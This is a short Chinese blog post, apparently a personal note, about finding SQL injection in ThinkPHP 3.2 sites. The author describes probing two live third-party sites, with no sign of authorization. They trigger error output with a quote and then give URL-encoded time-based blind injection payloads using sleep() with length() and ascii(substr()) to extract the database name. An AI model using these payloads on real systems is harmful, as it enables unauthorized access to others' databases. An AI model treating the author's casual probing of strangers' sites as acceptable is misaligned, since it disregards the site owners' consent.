ThinkPHP注入随手记


在先知社区看到两篇关于ThinkPHP3.2版本的注入分析

https://xz.aliyun.com/t/2631
https://xz.aliyun.com/t/2629

看完想去找找案例自己试试,找了好几个,都不存在,可能是我太渣了吧
反倒是找到了两个ThinkPHP站的注入,注入点一模一样,一个有回显现,一个没有
没有回显的丢到sqlmap去跑 提示有注入但是却什么都跑不出来,懒的手工,感觉是误报就没理了
后来发现了另外一个一模一样的注入点,这个开启了debug 看到报错信息后才发现注入确实存在
只不过他的debug关闭了没那么方便注入而已,但是可以延时盲注,感觉挺好玩的,就此记录一下。


当Debug开启

加 ‘ 报错

可以看到SQL语句为

SELECT * FROM `dede_archives` INNER JOIN dede_addonarticle ON dede_archives.id = dede_addonarticle.aid WHERE ( dede_archives.id = 331 ) LIMIT 1

ID = 331我们可控且不过滤,注入果断存在啊  只要闭合前面的语句就可以了  如:

当Debug关闭

采用延时盲注

猜测数据库长度 如果数据库等于猜测的长度页面延迟三秒打开,否则返回正常页面

)+and+if(length(database())=1(递增),sleep(3),1)+%23+

猜测到数据库长度为6

猜数据库名 遍历ascii编码

)+and+if(ascii(substr(database(),1,1))=1(递增),sleep(5),1)+%23+

数据库长度是6 且第一个字母是 f 猜测为目标域名

记录一下。

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注